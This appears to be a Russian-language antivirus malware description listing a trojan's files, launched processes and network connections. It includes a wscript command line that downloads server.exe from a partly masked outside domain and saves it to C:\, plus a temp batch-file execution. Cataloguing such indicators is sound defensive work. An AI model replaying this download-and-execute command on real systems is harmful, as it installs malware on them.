Техническая информация
- C:\server.exe
- C:\server.exe (загружен из сети Интернет)
- <SYSTEM32>\wscript.exe "<Текущая директория>\1.VBS" /furl:http://TU###IOAQUI.COM/server.exe /save_path:C:\ /file_name:server.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\tmpfile0.bat" "
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\server[1].exe
- <Текущая директория>\1.VBS
- %TEMP%\tmpfile0.tmp
- C:\server.exe
- <Текущая директория>\token3.txt
- %TEMP%\tmpfile0.bat
- <Текущая директория>\token2.txt
- <Текущая директория>\token1.txt
- <Текущая директория>\token3.txt
- %TEMP%\tmpfile0.tmp
- <Текущая директория>\token2.txt
- <Текущая директория>\1.VBS
- <Текущая директория>\token1.txt
- 'tu###ioaqui.com':80
- 'localhost':1035
- tu###ioaqui.com/server.exe
- DNS ASK tu###ioaqui.com
- '<IP-адрес в локальной сети>':1036